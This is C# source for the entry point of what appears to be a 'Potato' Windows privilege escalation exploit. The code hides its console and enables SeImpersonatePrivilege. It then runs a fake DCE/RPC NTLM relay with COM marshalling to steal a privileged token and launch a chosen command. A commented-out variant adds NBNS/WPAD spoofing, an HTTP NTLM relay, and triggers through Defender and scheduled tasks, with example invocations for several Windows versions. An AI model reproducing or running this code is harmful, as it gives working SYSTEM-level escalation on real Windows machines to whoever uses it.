static int Main(string[] args) { IntPtr handle = GetConsoleWindow(); // Hide ShowWindow(handle, SW_HIDE); InvokePrivs.EnablePriv("SeImpersonatePrivilege"); if (args.LongLength > 0) { string cmd = args[0]; //= Shell.GetCommand(Process.GetCurrentProcess().MainModule.FileName); } else { Environment.Exit(-1); } DCERPCNtlmHandler dcerpcServer = new DCERPCNtlmHandler(); Thread bootstrapThread = null; Thread dcerpcThread = null; dcerpcThread = new Thread(() => dcerpcServer.start("", "6666", "", "135", false, "true", cmd)); dcerpcThread.Start(); Thread.Sleep(100); try { bootstrapThread = new Thread(() => ComUtils.BootstrapComMarshal()); bootstrapThread.Start(); } catch (Exception e) { Console.WriteLine("This wasn't supposed to happen... {0}", e); } if (dcerpcThread != null) { DCERPCNtlmHandler.finished.WaitOne(); if (!Shell.NtShell) { NtToken main_token = NtToken.OpenProcessToken(); //TokenUtils.CreateProcessForToken("powershell.exe -EncodedCommand " + cmd, main_token, false); TokenUtils.CreateProcessForToken(cmd, main_token, false); } Thread.Sleep(100); Environment.Exit(0); dcerpcThread.Abort(); bootstrapThread.Abort(); } Environment.Exit(0); return(0); }
// static int Main(string[] args) { Dictionary <string, string> argDict = parseArgs(args); String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start"; String ip = null, drop_first = null, enable_httpserver = null, spoof_address = null, enable_dce = null, enable_exhaust = null, enable_spoof = null, enable_defender = null, enable_defender_scan = null, schedule_task = null, spoof_host = "WPAD", enable_etw = null, enable_token = null; String wpad_exclude_str = ""; int srvPort = 80; if (argDict.ContainsKey("ip")) { ip = argDict["ip"]; } if (argDict.ContainsKey("cmd")) { cmd = argDict["cmd"]; } if (argDict.ContainsKey("enable_exhaust")) { enable_exhaust = argDict["enable_exhaust"]; } if (argDict.ContainsKey("enable_httpserver")) { enable_httpserver = argDict["enable_httpserver"]; } if (argDict.ContainsKey("enable_defender")) { enable_defender = argDict["enable_defender"]; } if (argDict.ContainsKey("enable_defender_scan")) { enable_defender_scan = argDict["enable_defender_scan"]; } if (argDict.ContainsKey("enable_spoof")) { enable_spoof = argDict["enable_spoof"]; } if (argDict.ContainsKey("enable_etw")) { enable_etw = argDict["enable_etw"]; } if (argDict.ContainsKey("spoof_host")) { spoof_host = argDict["spoof_host"]; } if (argDict.ContainsKey("wpad_exclude")) { wpad_exclude_str = argDict["wpad_exclude"]; } if (argDict.ContainsKey("schedule_task")) { schedule_task = argDict["schedule_task"]; } if (argDict.ContainsKey("srv_port")) { srvPort = Int32.Parse(argDict["srv_port"]); } if (argDict.ContainsKey("enable_dce")) { enable_dce = argDict["enable_dce"]; } if (argDict.ContainsKey("spoof_address")) { spoof_address = argDict["spoof_address"]; } else { spoof_address = ""; } if (argDict.ContainsKey("drop_first_dcom")) { drop_first = argDict["drop_first_dcom"]; } if (argDict.ContainsKey("enable_token")) { enable_token = argDict["enable_token"]; } ; // if (args.Length > 0) { if (args[0].ToLower() == "-h" || args[0].ToLower() == "--h" || args[0].ToLower() == "-help" || args[0].ToLower() == "--help" || args[0].ToLower() == "/?") { PrintHelp(); Console.WriteLine("\nExample Windows 7:\nPotato.exe -ip <ip> -cmd \"ping\" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true"); Console.WriteLine("\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping\" -enable_httpserver true -schedule_task true"); Console.WriteLine("\nExample Windows Server 2008:\nPotato.exe -ip <ip> -cmd \"ping\" -enable_httpserver true -enable_spoof true -spoof_host \"WPAD.DOMAIN.TLD\" "); Console.WriteLine("\nExample Windows Server 2012:\nPotato.exe -ip <ip> -cmd \"ping\" -enable_httpserver true -enable_spoof true"); Console.WriteLine("\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping\" -enable_httpserver true -enable_defender_scan true"); Console.WriteLine("\nExample Enable WebClient:\nPotato.exe -enable_etw true\nPotato.exe -enable_etw 22b6d684-fa63-4578-87c9-effcbe6643c7"); Console.WriteLine("\nExample IIS/MSSQL/*:\nPotato.exe -enable_token true -enable_dce true"); Console.WriteLine("Potato.exe -enable_token true -enable_httpserver true -enable_defender_scan true -srv_port 9595"); Console.WriteLine("Potato.exe"); Environment.Exit(0); } } else { enable_token = "true"; enable_dce = "true"; } // if (enable_token != null) { // Console.WriteLine("Enabiling your privs...."); InvokePrivs.EnablePriv("SeImpersonatePrivilege"); } // if (enable_etw != null) { EventTriggers.start_service(enable_etw); } // String[] wpad_exclude = wpad_exclude_str.Split(','); HTTPNtlmHandler httpServer = new HTTPNtlmHandler(); Thread httpServerThread = null; if (enable_httpserver != null && enable_httpserver.Equals("true")) { httpServerThread = new Thread(() => httpServer.startListening(cmd, wpad_exclude, srvPort, enable_token)); httpServerThread.Start(); } // DCERPCNtlmHandler dcerpcServer = new DCERPCNtlmHandler(); bool dropFirst = drop_first != null && drop_first.Equals("true"); Thread bootstrapThread = null; Thread dcerpcThread = null; if (enable_dce != null && enable_dce.Equals("true")) { dcerpcThread = new Thread(() => dcerpcServer.start("", "6666", "", "135", cmd, dropFirst, enable_token)); dcerpcThread.Start(); Thread.Sleep(100); try { bootstrapThread = new Thread(() => ComUtils.BootstrapComMarshal()); bootstrapThread.Start(); } catch (Exception e) { Console.WriteLine("This wasn't supposed to happen... {0}", e); } } // Spoofer spoof = new NBNSSpoofer(); bool enableExhaust = enable_exhaust != null && enable_exhaust.Equals("true"); Thread spoofThread = new Thread(() => spoof.startSpoofing(ip, spoof_host, spoof_address, enableExhaust)); if (enable_spoof != null && enable_spoof.Equals("true")) { if (ip == null || spoof_address == null) { Console.WriteLine("Need IP and spoof address for spoofing?"); Environment.Exit(0); } spoofThread.Start(); if (enableExhaust) { while (NBNSSpoofer.doneUdp == false) { Thread.Sleep(2000); } } spoof.checkSpoof(spoof_host, spoof_address); Console.WriteLine("Spoofed target " + spoof_host + " succesfully..."); } // UpdateLauncher updateL = new UpdateLauncher(); Thread updateLThread = new Thread(() => updateL.launchUpdateCheck()); if (enable_defender != null && enable_defender.Equals("true")) { updateLThread.Start(); } // Thread scanLThread = new Thread(() => updateL.scan_file(srvPort)); if (enable_defender_scan != null && enable_defender_scan.Equals("true")) { scanLThread.Start(); } // ScheduleTask sc = new ScheduleTask(); Thread schTask = new Thread(() => sc.schtask(srvPort)); if (schedule_task != null && schedule_task.Equals("true")) { schTask.Start(); } // if (httpServerThread != null) { httpServer.finished.WaitOne(); httpServerThread.Abort(); } // if (dcerpcThread != null) { DCERPCNtlmHandler.finished.WaitOne(); dcerpcThread.Abort(); bootstrapThread.Abort(); } // spoofThread.Abort(); updateLThread.Abort(); scanLThread.Abort(); Thread.Sleep(500); Environment.Exit(0); return(0); }